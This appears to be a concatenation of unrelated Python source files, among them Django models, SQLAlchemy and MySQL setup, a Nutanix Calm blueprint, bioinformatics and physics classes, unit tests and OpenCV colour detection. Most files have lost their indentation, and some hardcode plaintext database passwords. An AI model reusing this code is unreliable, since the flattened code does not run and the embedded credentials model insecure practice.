actors = list(set(self._parse_actors(casts) + self._parse_actors(callbacks)))
for actor in actors:
# For each actor, creates a list of casts and callbacks stripping
# the actor part from the dictionary.
# E.g., {'guider.cartridgeLoaded': int} -> {'cartridgeLoaded': int}
actor_casts = dict((keyword.split('.')[1], cast)
for keyword, cast in casts.items()
if keyword.split('.')[0] == actor)
actor_cbs = dict((keyword.split('.')[1], cb)
for keyword, cb in callbacks.items()
if keyword.split('.')[0] == actor)
self.add_model(actor, casts=actor_casts, callbacks=actor_cbs)
@staticmethod
def _parse_actors(values):
return list(map(lambda xx: xx.split('.')[0], list(values)))
def add_model(self, actor_name, casts={}, callbacks={}):
"""Adds a new actor to the datamodel.
Parameters:
actor_name (str):
The name of the actor.
casts (dict):
A dictionary of the form ``'keyword': func`` that defines
how to cast the values of that keyword.
E.g., ``{'cartridgeLoaded': int}``.
callbacks (dict):
A dictionary, similar to ``datamodel_casts`` with a callback
                function to call when the keyword gets updated.
"""
model = ActorModel(actor_name, casts=casts, callbacks=callbacks)
self[actor_name] = model
def __setitem__(self, key, value):
if key in self:
            raise ValueError('actor {!r} already in the model'.format(key))
assert isinstance(value, ActorModel), 'value being set must be an ActorModel'
dict.__setitem__(self, key, value)
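# Hedged sketch of using the datamodel on its own (no Hub connection needed);
# the actor and keyword names are made up for illustration:
#
#   model = HubModel(casts={'guider.cartridgeLoaded': int},
#                    callbacks={'guider.cartridgeLoaded': print})
#   model['guider']['cartridgeLoaded'] = '1'   # stored as [1]; the callback fires with [1]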
|
#!/usr/bin/env python3
import json
from .LogPrimFactory import LogPrimFactory
class JSONLogPrimFactory(LogPrimFactory):
"""
JSON Log Primitive Factory.
Log Format: JSON (from base dictionary object)
Functions
* logObj - json dump the base logObj output
* ... LogPrimFactories
"""
def logObj(self, *args, **kwargs):
"""
Take the base class output (a dictionary) and use json.dumps to pass back stringified JSON
"""
return json.dumps(super().logObj(*args, **kwargs))
|
#!/usr/bin/env python
#:coding=utf-8:
#:tabSize=2:indentSize=2:noTabs=true:
#:folding=explicit:collapseFolds=1:
import re, simplejson, types, jsonschema
from jsonschema.validator import JSONSchemaValidator
class FunctionValidator(JSONSchemaValidator):
'''FunctionValidator extends the JSONSchemaValidator to support Javascript
functions within JSON schema. This class demonstrates how to extend
JSONSchema and the Validator to add types and JSONSchema properties
to be validated.'''
def validate_type(self, x, fieldname, schema, fieldtype=None):
'''Performs very simple validation on the value of the function property to
make sure it is a Javascript function'''
if fieldtype == "function":
r = re.compile("^function")
value = x.get(fieldname)
if not r.match(value):
raise ValueError("Value for field '%s' is not a valid Javascript function definition" % fieldname)
else:
return x
else:
JSONSchemaValidator.validate_type(self, x, fieldname, schema, fieldtype)
def validate_class(self, x, fieldname, schema, classname=None):
if classname is not None and \
not isinstance(classname, types.StringType) and \
not isinstance(classname, types.UnicodeType):
raise ValueError("The classname %s must be a string" % repr(classname));
def main():
import sys
if len(sys.argv) == 1:
infile = sys.stdin
schemafile = sys.stdout
elif len(sys.argv) == 2:
if sys.argv[1] == "--help":
raise SystemExit("%s [infile [schemafile]]" % (sys.argv[0],))
infile = open(sys.argv[1], 'rb')
schemafile = sys.stdout
elif len(sys.argv) == 3:
infile = open(sys.argv[1], 'rb')
schemafile = open(sys.argv[2], 'rb')
else:
raise SystemExit("%s [infile [schemafile]]" % (sys.argv[0],))
try:
obj = simplejson.load(infile)
schema = simplejson.load(schemafile)
jsonschema.validate(obj, schema, validator_cls=FunctionValidator)
except ValueError, e:
raise SystemExit(e)
if __name__=='__main__':
main()
|
import requests
import json
r = requests.get('https://dex.binance.org/api/v1/ticker/24hr?symbol=MTXLT-286_BNB')
if r.status_code == 200:
print('Success!')
else:
    print('An error has occurred')
    raise SystemExit(1)
packages_json = r.json()
tixlPrice = packages_json[0]['lastPrice']
packages_str = json.dumps(packages_json, indent=2)
print('MTXLT price is ' + tixlPrice + ' BNB')
|
import sqlalchemy
import sqlalchemy.ext.declarative
import sqlalchemy.orm
# Global Setup
user = "postgres"
password = "python"
host = "localhost"
port = 5432
database = "postgres"
url = 'postgresql://{}:{}@{}:{}/{}'
db_string = url.format(user, password, host, port, database)
db = sqlalchemy.create_engine(db_string, echo=True)
base = sqlalchemy.ext.declarative.declarative_base()
class People(base):
__tablename__ = 'people'
PersonalNumber = sqlalchemy.Column(sqlalchemy.String, primary_key=True)
FirstName = sqlalchemy.Column(sqlalchemy.String)
LastName = sqlalchemy.Column(sqlalchemy.String)
StreetAddress = sqlalchemy.Column(sqlalchemy.String)
City = sqlalchemy.Column(sqlalchemy.String)
Region = sqlalchemy.Column(sqlalchemy.String)
Zip = sqlalchemy.Column(sqlalchemy.String)
Country = sqlalchemy.Column(sqlalchemy.String)
Pin = sqlalchemy.Column(sqlalchemy.String)
Date = sqlalchemy.Column(sqlalchemy.String)
Email = sqlalchemy.Column(sqlalchemy.String)
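# Short sketch of how this module might be used: create the table if it does
# not exist yet and insert one example row. The connection parameters above are
# assumed to point at a reachable PostgreSQL instance; the row values are
# placeholders.
if __name__ == '__main__':
    base.metadata.create_all(db)  # emits CREATE TABLE for 'people' if missing
    Session = sqlalchemy.orm.sessionmaker(bind=db)
    session = Session()
    session.add(People(PersonalNumber="19900101-0000",
                       FirstName="Ada",
                       LastName="Lovelace"))
    session.commit()
    session.close()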
|
from . import units, constants
_MeVc2 = units.MeV / constants.c ** 2
_e = constants.si.e
class Particle:
_defaults = {
"z": 0
}
def __init__(self, name : str, **kwargs):
self.properties = Particle._defaults.copy()
self.properties.update(kwargs)
@property
def rest_mass(self) -> units.Quantity:
return self.properties["rest_mass"]
@property
def rest_energy(self) -> units.Quantity:
return self.rest_mass * constants.c ** 2
def __call__(self, *args, **kwargs) -> "DynamicParticle":
return DynamicParticle(self, *args, **kwargs)
@property
def z(self) -> units.Quantity:
return self.properties["z"]
@property
def charge(self) -> units.Quantity:
return self.properties["z"] * _e
class DynamicParticle:
def __init__(self, particle : Particle, ekin):
self.particle = particle
self.kinetic_energy = ekin
def __getattr__(self, name):
return getattr(self.particle, name)
@property
def total_energy(self) -> units.Quantity:
return self.particle.rest_energy + self.kinetic_energy
@property
def total_mass(self) -> units.Quantity:
return self.total_energy / constants.c ** 2
@property
def gamma(self) -> float:
return float(self.total_energy / self.particle.rest_energy)
@property
def beta(self) -> float:
import numpy as np
return float(np.sqrt(1 - 1 / self.gamma ** 2))
@property
def velocity(self) -> units.Quantity:
return self.beta * constants.c
Proton = Particle("proton",
rest_mass=938.2720813 * _MeVc2,
z = 1
)
Neutron = Particle("neutron",
    rest_mass=939.5654133 * _MeVc2,
    z = 0  # the neutron carries no electric charge
)
Photon = Particle("photon", rest_mass=0 * _MeVc2)
Electron = Particle("electron",
rest_mass=0.5109989461 * _MeVc2,
z = -1
)
Positron = Particle("positron",
rest_mass=0.5109989461 * _MeVc2,
z = 1
)
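# Hedged usage sketch: kinetic energies are expressed with the same units
# module already used above (units.MeV). Calling a Particle with a kinetic
# energy yields a DynamicParticle exposing the derived relativistic quantities:
#
#   p = Proton(200 * units.MeV)
#   p.gamma, p.beta, p.velocity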
|
from Bio import SeqIO, Seq
import re
import itertools
class SubReference():
def __init__(self,reference_file):
reference = next(SeqIO.parse(reference_file,'fasta'))
(self.reference_name,self.min_pos,self.max_pos) = self._parse_label(reference.name)
self._reference_seq = reference.seq
def is_valid_pos(self,pos):
return self.min_pos <= pos < self.max_pos
def _parse_label(self,label):
result = re.match('(?P<ref>\w*):(?P<min>\d*)-(?P<max>\d*)', label)
zero_based_min = int(result.group('min'))-1
zero_based_max = int(result.group('max'))-1
return (result.group('ref'),zero_based_min,zero_based_max)
def __getitem__(self,sliceobj):
sliced_bases = None
if isinstance(sliceobj, int):
sliced_bases= self._reference_seq[sliceobj-self.min_pos]
elif isinstance(sliceobj, slice):
new_slice = slice(sliceobj.start-self.min_pos,sliceobj.stop-self.min_pos,sliceobj.step)
sliced_bases= self._reference_seq[new_slice]
else:
raise TypeError
return sliced_bases.upper()
def __len__(self):
return self.max_pos+1
class HeterozygoteStrategy():
def __call__(self,pileupcolumn,base_probs):
filtered_bases = self._heterogeneous_bases(base_probs)
if len(filtered_bases.keys()) < 2:
filtered_bases = {}
return filtered_bases
def format_output(self,reference_name, pos, called_snvs):
output = ''
for base, stats in called_snvs.iteritems():
output += self._format(reference_name,str(pos),base,stats['prob'],stats['avg'])
return output
def _heterogeneous_bases(self,base_probs):
return dict((base,probs)for base, probs in base_probs.iteritems() if probs['prob'] >= 0.2 and probs['prob'] <= 0.8)
def _format(self,reference, pos, base,prob,avg):
return "{reference}\t{pos}\t{base}\t{prob}\t{avg}\n".format(reference=reference,pos=pos,base=base,prob=prob,avg=avg)
class ReferenceStrategy():
def __init__(self,reference_obj):
self.reference = reference_obj
self._written_header = False
def __call__(self,pileupcolumn,base_probs, frequency_cutoff=0.2):
filtered_probs = {}
reference_pos = pileupcolumn.pos
if self.reference.is_valid_pos(reference_pos):
reference_base = self.reference[reference_pos]
for base,probs in base_probs.iteritems():
if probs['prob'] >= frequency_cutoff:
filtered_probs[base]=probs
if not any(map(lambda base_tuple: base_tuple[0] != reference_base,filtered_probs)):
filtered_probs = {}
return filtered_probs
def format_output(self,reference_name, pos, called_snvs):
if not any(called_snvs):
return ''
output = ''
if not self._written_header:
self._written_header = True
output+= '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tSAMPLE\n'
chrom_num = re.search('\d+',reference_name).group(0)
ref = self.reference[pos]
alts = []
freqs = []
quals = []
for base, stats in sorted(called_snvs.iteritems(),key=lambda base_tuple: base_tuple[0]):
if base != ref:
alts.append(base)
freqs.append(stats['prob'])
quals.append(stats['avg'])
all_found_bases = called_snvs.keys()
genotypes = self._format_genotypes(all_found_bases,ref,alts)
output += self._format(chrom_num,pos,ref,alts,quals,freqs,genotypes)
return output
def _format_genotypes(self,all_found_bases,ref,alts):
positions = []
for base in all_found_bases:
if base == ref:
positions.append(str(0))
else:
positions.append(str(alts.index(base)+1))
if len(positions) == 1:
return '{}/{}'.format(positions[0],positions[0])
else:
return ','.join(map(lambda x: '/'.join(sorted(x)),itertools.combinations(positions,2)))
def _format(self,chrom_num,pos,ref,alts,quals,freqs,sample,identifier='.',filt='PASS',form='GT'):
info = 'AF={}'.format(','.join(map(lambda x: str(x),freqs)))
alt = ','.join(alts)
return '{chrom_num}\t{pos}\t{id}\t{ref}\t{alt}\t{qual}\t{filter}\t{info}\t{format}\t{sample}\n'\
.format(chrom_num=chrom_num,pos=pos,id=identifier,ref=ref,alt=alt,qual=quals[0],filter=filt,info=info,format=form,sample=sample)
|
# Generated by Django 3.2.2 on 2021-05-06 10:40
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=15)),
('description', models.TextField()),
('points', models.IntegerField(validators=[django.core.validators.MaxValueValidator(10)])),
('assignee', models.ForeignKey(default=None, on_delete=django.db.models.deletion.RESTRICT, related_name='assign', to=settings.AUTH_USER_MODEL)),
],
),
]
|
from textx import metamodel_from_file
from Robot import Robot
from Robot import default
robotlang = metamodel_from_file('robot.tx')
robot_model = robotlang.model_from_file('one.rl')
robotlang.register_obj_processors({'MoveCommand': default})
r1 = Robot()
r1.interpret(robot_model)
input("Program complete. Press Enter to close.")
from component import mymysql
from component.mymysql import execute
mymysql.init({
'host': "192.168.121.133",
'port': 3306,
'database': 'laashub',
'user': 'laashub',
'password': 'laashub123',
'charset': 'utf8mb4',
})
if __name__ == '__main__':
target_id = 38
# query all
print(execute("""
select * from designer_data_directory
"""))
# query with condition
print(execute("""
select * from designer_data_directory where id = %(id)s
""", {
"id": target_id
}))
# insert
print(execute("""
insert into designer_data_directory(pid, name) values (%(pid)s,%(name)s)
""", {
"pid": target_id,
"name": "test2"
}))
# update
print(execute("""
update designer_data_directory set name = %(name)s where id = %(id)s
""", {
"id": target_id,
"name": "test",
}))
# delete
print(execute("""
delete from designer_data_directory where id = %(id)s
""", {"id": target_id}))
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from shops.models import Shop
class Category(models.Model):
# shop = models.ForeignKey(Shop, on_delete=models.CASCADE, related_name='categories')
name = models.CharField(max_length=50, verbose_name=_('Name'))
tax = models.FloatField(verbose_name=_('Tax'), default=0)
tax_included = models.BooleanField(verbose_name=_('Tax included'), default=True)
modified = models.DateTimeField(auto_now_add=True, verbose_name=_('Modified'))
order = models.IntegerField(verbose_name=_('Order'), default=255)
is_active = models.BooleanField(default=True, verbose_name=_('Is active'), )
class Meta:
ordering = ('order',)
class Product(models.Model):
name = models.CharField(max_length=200, verbose_name=_('Name'))
text = models.TextField(null=True, blank=True, verbose_name=_('Text'))
image = models.CharField(null=True, blank=True, max_length=250)
shop = models.ForeignKey(Shop, on_delete=models.CASCADE, related_name='products')
category = models.ForeignKey(Category, on_delete=models.SET_NULL, related_name='products', null=True, blank=True)
price = models.FloatField(default=0, verbose_name=_('Sales Price'), )
visible_web = models.BooleanField(default=True, verbose_name=_('Visible for web'), )
archive = models.BooleanField(default=False)
modified = models.DateTimeField(auto_now_add=True, verbose_name=_('Modified'))
|
"""
Calm DSL .DEV Copenhagen Hybrid Cloud Blueprint
author: [email protected]
date: 2019-09-27
"""
from calm.dsl.builtins import ref, basic_cred
from calm.dsl.builtins import action, parallel
from calm.dsl.builtins import CalmTask
from calm.dsl.builtins import CalmVariable
from calm.dsl.builtins import Service, Package, Substrate
from calm.dsl.builtins import Deployment, Profile, Blueprint, PODDeployment
from calm.dsl.builtins import (
provider_spec,
read_provider_spec,
read_spec,
read_local_file,
)
ERA_KEY = read_local_file("era_key")
CENTOS_KEY = read_local_file("centos_key")
KARBON_KEY = read_local_file("karbon_key")
DB_PASSWD = read_local_file("db_passwd")
EraCreds = basic_cred("admin", ERA_KEY, name="era_creds")
CentOsCreds = basic_cred(
"centos", CENTOS_KEY, name="centos_creds", type="KEY", default=True
)
KarbonCreds = basic_cred("admin", KARBON_KEY, name="karbon")
class Postgres(Service):
pass
class WebServer1(Service):
"""WebServer1 AHV Service"""
dependencies = [ref(Postgres)]
@action
def __create__():
CalmTask.Exec.ssh(
name="1CloneRepo",
filename="scripts/webserver/create/CloneRepo.sh",
cred=CentOsCreds,
)
CalmTask.Exec.ssh(
name="2ConfigureSite",
filename="scripts/webserver/create/ConfigureSite.sh",
cred=CentOsCreds,
)
CalmTask.Exec.ssh(
name="3DatabaseSetup",
filename="scripts/webserver/create/DatabaseSetupAHV.sh",
cred=CentOsCreds,
)
@action
def __start__():
CalmTask.Exec.ssh(
name="1StartWebServer",
filename="scripts/webserver/start/StartWebServer.sh",
cred=CentOsCreds,
)
@action
def __stop__():
CalmTask.Exec.ssh(
name="1StopWebServer",
filename="scripts/webserver/stop/StopWebServer.sh",
cred=CentOsCreds,
)
class WebServer2(Service):
"""WebServer2 AWS Service"""
dependencies = [ref(Postgres)]
@action
def __create__():
CalmTask.Exec.ssh(
name="1CloneRepo",
filename="scripts/webserver/create/CloneRepo.sh",
cred=CentOsCreds,
)
CalmTask.Exec.ssh(
name="2ConfigureSite",
filename="scripts/webserver/create/ConfigureSite.sh",
cred=CentOsCreds,
)
CalmTask.Exec.ssh(
name="3DatabaseSetup",
filename="scripts/webserver/create/DatabaseSetupAWS.sh",
cred=CentOsCreds,
)
@action
def __start__():
CalmTask.Exec.ssh(
name="1StartWebServer",
filename="scripts/webserver/start/StartWebServer.sh",
cred=CentOsCreds,
)
@action
def __stop__():
CalmTask.Exec.ssh(
name="1StopWebServer",
filename="scripts/webserver/stop/StopWebServer.sh",
cred=CentOsCreds,
)
class WebServerK8s(Service):
"""WebServer Kubernetes Service"""
dependencies = [ref(Postgres)]
class HaProxy(Service):
"""HaProxy Service"""
dependencies = [ref(WebServer1), ref(WebServer2), ref(WebServerK8s)]
class PostgresPackage(Package):
services = [ref(Postgres)]
class WebServer1Package(Package):
services = [ref(WebServer1)]
@action
def __install__():
CalmTask.Exec.ssh(
name="1InstallSoftware",
filename="scripts/webserver/package_install/InstallSoftware.sh",
cred=CentOsCreds,
)
class WebServer2Package(Package):
services = [ref(WebServer2)]
@action
def __install__():
CalmTask.Exec.ssh(
name="1InstallSoftware",
filename="scripts/webserver/package_install/InstallSoftware.sh",
cred=CentOsCreds,
)
class HaProxyPackage(Package):
services = [ref(HaProxy)]
@action
def __install__():
CalmTask.Exec.ssh(
name="1ConfigureHaProxy",
filename="scripts/haproxy/package_install/ConfigureHaProxy.sh",
cred=CentOsCreds,
)
class Era_PostgreSQL_DB(Substrate):
"""Postgres VM provisioned by Era"""
provider_type = "EXISTING_VM"
provider_spec = provider_spec({"address": "@@{DB_SERVER_IP}@@"})
readiness_probe = {
"disabled": True,
"delay_secs": "0",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(CentOsCreds),
}
@action
def __pre_create__():
CalmTask.SetVariable.escript(
name="1GetClusterID",
filename="scripts/postgres/precreate/1GetClusterID.py",
variables=["CLUSTER_ID", "TIME"],
)
CalmTask.SetVariable.escript(
name="2GetProfileIDs",
filename="scripts/postgres/precreate/2GetProfileIDs.py",
variables=[
"SOFTWARE_PROF_ID",
"COMPUTE_PROF_ID",
"NETWORK_PROF_ID",
"DB_PARAM_ID",
],
)
CalmTask.SetVariable.escript(
name="3GetSLAID",
filename="scripts/postgres/precreate/3GetSLAID.py",
variables=["SLA_ID", "DB_NAME"],
)
CalmTask.SetVariable.escript(
name="4ProvisionDB",
filename="scripts/postgres/precreate/4ProvisionDB.py",
variables=["CREATE_OPERATION_ID"],
)
CalmTask.SetVariable.escript(
name="5MonitorOperation",
filename="scripts/postgres/precreate/5MonitorOperation.py",
variables=["DB_ENTITY_NAME"],
)
CalmTask.SetVariable.escript(
name="6GetDatabaseInfo",
filename="scripts/postgres/precreate/6GetDatabaseInfo.py",
variables=["DB_SERVER_IP", "DB_ID", "DB_SERVER_ID"],
)
@action
def __post_delete__():
CalmTask.SetVariable.escript(
name="1CleanupDB",
filename="scripts/postgres/postdelete/1CleanupDB.py",
variables=["CLEANUP_OPERATION_ID"],
)
CalmTask.Exec.escript(
name="2MonitorCleanupOp",
filename="scripts/postgres/postdelete/2MonitorCleanupOp.py",
)
CalmTask.SetVariable.escript(
name="3DeregisterDBServer",
filename="scripts/postgres/postdelete/3DeregisterDBServer.py",
variables=["DEREGISTER_OPERATION_ID"],
)
CalmTask.Exec.escript(
name="4MonitorDeregOp",
filename="scripts/postgres/postdelete/4MonitorDeregOp.py",
)
class WebServer1_AHV(Substrate):
"""WebServer1 AHV Substrate"""
provider_spec = read_provider_spec("ahv_spec.yaml")
provider_spec.spec["name"] = "wb1-ahv-@@{calm_time}@@"
readiness_probe = {
"disabled": False,
"delay_secs": "0",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(CentOsCreds),
}
class WebServer2_AWS(Substrate):
"""WebServer2 AWS Substrate"""
provider_type = "AWS_VM"
provider_spec = read_provider_spec("aws_spec.yaml")
provider_spec.spec["name"] = "wb2-aws-@@{calm_time}@@"
readiness_probe = {
"disabled": False,
"delay_secs": "60",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(CentOsCreds),
}
class HaProxy_AHV(Substrate):
"""HaProxy AHV Substrate"""
provider_spec = read_provider_spec("ahv_spec.yaml")
provider_spec.spec["name"] = "ha-@@{calm_time}@@"
readiness_probe = {
"disabled": False,
"delay_secs": "10",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(CentOsCreds),
}
class PostgresDeployment(Deployment):
"""Era Postgres Deployment"""
packages = [ref(PostgresPackage)]
substrate = ref(Era_PostgreSQL_DB)
class WebServer1Deployment(Deployment):
"""WebServer1 AHV Deployment"""
packages = [ref(WebServer1Package)]
substrate = ref(WebServer1_AHV)
class WebServer2Deployment(Deployment):
"""WebServer2 AWS Deployment"""
packages = [ref(WebServer2Package)]
substrate = ref(WebServer2_AWS)
class WebServerK8sDeployment(PODDeployment):
"""WebServer Kubernetes Deployment"""
containers = [WebServerK8s]
deployment_spec = read_spec("webserver_deployment.yaml")
service_spec = read_spec("webserver_service.yaml")
dependencies = [ref(PostgresDeployment)]
class HaProxyDeployment(Deployment):
packages = [ref(HaProxyPackage)]
substrate = ref(HaProxy_AHV)
class Default(Profile):
deployments = [
PostgresDeployment,
WebServer1Deployment,
WebServer2Deployment,
WebServerK8sDeployment,
HaProxyDeployment,
]
compute_profile = CalmVariable.WithOptions.Predefined.string(
["DEFAULT_OOB_COMPUTE", "SMALL_COMPUTE", "LARGE_COMPUTE"],
default="DEFAULT_OOB_COMPUTE",
is_mandatory=True,
runtime=True,
)
database_parameter = CalmVariable.Simple(
"DEFAULT_POSTGRES_PARAMS", is_mandatory=True, runtime=True
)
db_prefix = CalmVariable.Simple("psql", is_mandatory=True, runtime=True)
db_password = CalmVariable.Simple(
DB_PASSWD, is_hidden=True, is_mandatory=True, runtime=True
)
era_ip = CalmVariable.Simple(
"",
regex=r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",
is_mandatory=True,
runtime=True,
)
network_profile = CalmVariable.Simple(
"DEFAULT_OOB_NETWORK", is_mandatory=True, runtime=True
)
sla_name = CalmVariable.Simple("GOLD", is_mandatory=True, runtime=True)
software_profile = CalmVariable.Simple(
"POSTGRES_10.4_OOB", is_mandatory=True, runtime=True
)
kubemaster_ip = CalmVariable.Simple("", is_mandatory=True, runtime=True)
@action
def UpdateApp():
"""This action updates the app with the most recent code from git"""
label = CalmVariable.Simple("latest", is_mandatory=True, runtime=True)
with parallel():
CalmTask.Exec.ssh(
name="1RemoveWS1",
filename="scripts/haproxy/updateapp/RemoveWS1.sh",
target=ref(HaProxy),
)
CalmTask.Exec.escript(
name="1UpdateContainers",
filename="scripts/webserver/updateapp/UpdateContainers.py",
target=ref(WebServerK8s),
)
CalmTask.Exec.ssh(
name="2StopWebServer",
filename="scripts/webserver/stop/StopWebServer.sh",
target=ref(WebServer1),
)
CalmTask.Exec.ssh(
name="3UpdateFromGit",
filename="scripts/webserver/updateapp/UpdateFromGit.sh",
target=ref(WebServer1),
)
CalmTask.Exec.ssh(
name="4ConfigureSite",
filename="scripts/webserver/create/ConfigureSite.sh",
target=ref(WebServer1),
)
CalmTask.Exec.ssh(
name="5StartWebServer",
filename="scripts/webserver/start/StartWebServer.sh",
target=ref(WebServer1),
)
CalmTask.Exec.ssh(
name="6AddWS1",
filename="scripts/haproxy/updateapp/AddWS1.sh",
target=ref(HaProxy),
)
CalmTask.Exec.ssh(
name="7Delay",
filename="scripts/haproxy/updateapp/Delay.sh",
target=ref(HaProxy),
)
CalmTask.Exec.ssh(
name="8RemoveWS2",
filename="scripts/haproxy/updateapp/RemoveWS2.sh",
target=ref(HaProxy),
)
CalmTask.Exec.ssh(
name="9StopWebServer",
filename="scripts/webserver/stop/StopWebServer.sh",
target=ref(WebServer2),
)
CalmTask.Exec.ssh(
name="10UpdateFromGit",
filename="scripts/webserver/updateapp/UpdateFromGit.sh",
target=ref(WebServer2),
)
CalmTask.Exec.ssh(
name="11ConfigureSite",
filename="scripts/webserver/create/ConfigureSite.sh",
target=ref(WebServer2),
)
CalmTask.Exec.ssh(
name="12StartWebServer",
filename="scripts/webserver/start/StartWebServer.sh",
target=ref(WebServer2),
)
CalmTask.Exec.ssh(
name="13AddWS2",
filename="scripts/haproxy/updateapp/AddWS2.sh",
target=ref(HaProxy),
)
class DevCpnhgnHybridDSL(Blueprint):
"""* [Application Link](http://@@{HaProxy.address}@@/)"""
credentials = [EraCreds, CentOsCreds, KarbonCreds]
services = [Postgres, WebServer1, WebServer2, WebServerK8s, HaProxy]
packages = [PostgresPackage, WebServer1Package, WebServer2Package, HaProxyPackage]
substrates = [Era_PostgreSQL_DB, WebServer1_AHV, WebServer2_AWS, HaProxy_AHV]
profiles = [Default]
def main():
print(DevCpnhgnHybridDSL.json_dumps(pprint=True))
if __name__ == "__main__":
main()
|
from custom_envs.envs.quadrotor_14d_env import Quadrotor14dEnv
from custom_envs.envs.double_pendulum_env import DoublePendulumEnv
from custom_envs.envs.diff_drive_env import DiffDriveEnv
from custom_envs.envs.ball_and_beam_env import BallAndBeamEnv
|
""" Test for lib functions """
import os
import unittest
from unittest import mock
from pygyver.etl.lib import bq_token_file_valid
from pygyver.etl.lib import extract_args
from pygyver.etl.lib import remove_first_slash
from pygyver.etl.lib import add_dataset_prefix
from pygyver.etl.lib import apply_kwargs
from pygyver.etl.lib import get_dataset_prefix
def bq_token_file_path_exists_mock(token_path):
"""
    Mock bq_token_file_path_exists to return True
"""
return True
class FunctionsinLib(unittest.TestCase):
"""
Unittest class for lib functions
"""
def setUp(self):
self.credential_back_up = os.environ['GOOGLE_APPLICATION_CREDENTIALS']
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = 'my_path/my_token.json'
def tearDown(self):
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = self.credential_back_up
def test_bq_token_file_valid_when_does_not_exists(self):
"""
        Tests that bq_token_file_valid raises a ValueError when the file does not exist.
"""
with self.assertRaises(ValueError):
bq_token_file_valid()
def test_bq_token_file_valid(self):
"""
Tests that bq_token_file_valid is True when the file exists (mocked).
"""
with mock.patch('pygyver.etl.lib.bq_token_file_path_exists') as mock_bq_token_file_path_exists:
mock_bq_token_file_path_exists.side_effect = bq_token_file_path_exists_mock
self.assertTrue(
bq_token_file_valid(),
"Token file is not valid"
)
def test_remove_first_slash(self):
self.assertEqual(
remove_first_slash("/sandbox"), "sandbox",
"first slash not removed - wrong"
)
self.assertEqual(
remove_first_slash("sandbox"), "sandbox",
"no first slash - ok"
)
self.assertEqual(
remove_first_slash(""), "",
"empty string - ok"
)
def test_extract_args_1_param(self):
content = [
{
"table_desc": "table1",
"create_table": {
"table_id": "table1",
"dataset_id": "test",
"file": "tests/sql/table1.sql"
},
"pk": ["col1", "col2"],
"mock_data": "sql/table1_mocked.sql"
},
{
"table_desc": "table2",
"create_table": {
"table_id": "table2",
"dataset_id": "test",
"file": "tests/sql/table2.sql"
},
"pk": ["col1"],
"mock_data": "sql/table1_mocked.sql"
}
]
self.assertEqual(
extract_args(content, "pk"),
[["col1", "col2"], ["col1"]],
"extracted ok"
)
self.assertEqual(
extract_args(content, "create_table"),
[
{
"table_id": "table1",
"dataset_id": "test",
"file": "tests/sql/table1.sql"
},
{
"table_id": "table2",
"dataset_id": "test",
"file": "tests/sql/table2.sql"
}
],
"extracted ok"
)
def test_add_dataset_prefix(self):
self.yaml = {
"desc": "test",
"tables":
[
{
"table_desc": "table1",
"create_table": {
"table_id": "table1",
"dataset_id": "test",
},
},
{
"table_desc": "table2",
"create_table": {
"table_id": "table2",
"dataset_id": "test",
},
}
]
}
add_dataset_prefix(
self.yaml,
dataset_prefix='1234_'
)
self.assertEqual(
self.yaml
,
{
"desc": "test",
"tables":
[
{
"table_desc": "table1",
"create_table": {
"table_id": "table1",
"dataset_id": "1234_test",
},
},
{
"table_desc": "table2",
"create_table": {
"table_id": "table2",
"dataset_id": "1234_test",
},
}
]
},
"dataset prefix properly added to dataset_id"
)
def test_get_dataset_prefix(self):
self.assertEqual(
get_dataset_prefix(),
None
)
# See test_pipeline.TestRunReleases() for pipeline based testing
if __name__ == "__main__":
unittest.main()
|
# -*- coding: utf-8 -*-
"""
Reads the most recent maintenance events from a csv into a dictionary. Then
writes that dictionary to a text file in json format.
"""
import csv
import json
# Initialize variables
my_dict = {}
last_asset = ''
# Reads data from csv into a dictionary
with open('mx_raw (1).csv', newline='') as csvfile:
myreader = csv.reader(csvfile, delimiter=',')
next(myreader, None) # skips header row
for row in myreader:
if row[0] != last_asset:
last_asset = row[0]
my_dict[row[0]] = {'description': row[1],'Priority Number': row[10],
'event':[{'work_id': row[2],
'status': row[3],
'event_id': row[4],
'event_name': row[5],
'duration': row[6],
'date': row[7],
'mx_type': row[8],
'mx_kind': row[9]
}]
}
else:
my_dict[last_asset]['event'].append({'work_id': row[2],
'status': row[3],
'event_id': row[4],
'event_name': row[5],
'duration': row[6],
'date': row[7],
'mx_type': row[8],
'mx_kind': row[9]
})
#my_dict.pop('Closed') # deletes empty rows
# Writes dictionary to text file in json format
with open('mx_json.txt', 'w') as outfile:
json.dump(my_dict, outfile) |
import numpy as np
from cv2 import cv2 as cv
def redContours (rect,frame2) :
lower_red = np.array([0,50,50])
upper_red = np.array([10,255,255])
mask2 = cv.inRange(rect, lower_red, upper_red)
redcnts= cv.findContours(mask2,
cv.RETR_TREE,
cv.CHAIN_APPROX_SIMPLE)[-2]
if redcnts :
red_area = max(redcnts, key=cv.contourArea)
(x, y, w, h) = cv.boundingRect(red_area)
imageFrame = cv.rectangle(frame2, (x, y),
(x + w, y + h),
(0, 0, 255), 2)
cv.putText(imageFrame, "Red Colour", (x, y),
cv.FONT_HERSHEY_DUPLEX, 1.0,
(0, 0, 255))
cap = cv.VideoCapture(0)
while 1:
_, frame = cap.read()
hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)
lower_blue = np.array([100,150,0])
upper_blue = np.array([140,255,255])
mask = cv.inRange(hsv, lower_blue, upper_blue)
bluecnts = cv.findContours(mask,
cv.RETR_EXTERNAL,
cv.CHAIN_APPROX_SIMPLE)[-2]
if bluecnts :
blue_area = max(bluecnts, key=cv.contourArea)
(x, y, w, h) = cv.boundingRect(blue_area)
imageFrame = cv.rectangle(frame, (x, y),
(x + w, y + h),
(0, 255, 0), 2)
cv.putText(imageFrame, "Warna Biru", (x, y),
cv.FONT_HERSHEY_DUPLEX, 1.0,
(0, 255, 0))
